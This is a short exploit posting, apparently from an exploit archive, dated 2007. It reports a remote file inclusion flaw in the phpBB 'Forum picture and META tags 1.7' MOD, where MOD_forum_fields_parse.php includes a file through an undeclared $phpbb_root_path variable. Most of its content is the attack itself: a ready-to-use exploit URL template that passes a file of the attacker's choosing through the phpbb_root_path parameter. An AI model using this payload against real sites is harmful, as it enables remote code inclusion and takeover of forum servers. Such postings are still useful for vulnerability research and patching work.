id: 1674
date: 03/29/2007
title: phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability
author: bd0rk
cves: 

===========================================================
phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability
===========================================================



Exploitname: phpBB Module Forum picture and META tags 1.7 File Include Vulnerability

Founder: bd0rk

Greetings: TheJT, Lu7k, CodeR

Vulnerable in MOD_forum_fields_parse.php: include($phpbb_root_path . 'MOD_forum_fields_default.php');

#$phpbb_root_path is not declared!



[+]Exploit: http://[target]/[module_path]/MOD_forum_fields_parse.php?phpbb_root_path=FILE



#  0day.today [2023-03-26]  #